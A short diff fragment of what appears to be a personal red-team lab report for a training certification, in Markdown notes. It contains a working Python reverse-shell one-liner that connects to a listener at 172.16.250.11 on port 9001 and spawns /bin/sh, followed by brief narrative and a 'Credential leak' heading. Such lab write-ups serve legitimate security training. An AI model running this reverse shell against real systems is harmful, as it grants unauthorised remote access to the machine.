GalileoQ/ObsidianGIT/CRTA/Red Team Report (CRTA).md

 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.250.11",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
 ```

 And finally we will be listening to the port we have selected.
-In this case the port 9001
+In this case the port 9001.
+We can see that we belong to another network interface
 ![[Pasted image 20250512162449.png]]

 # Credential leak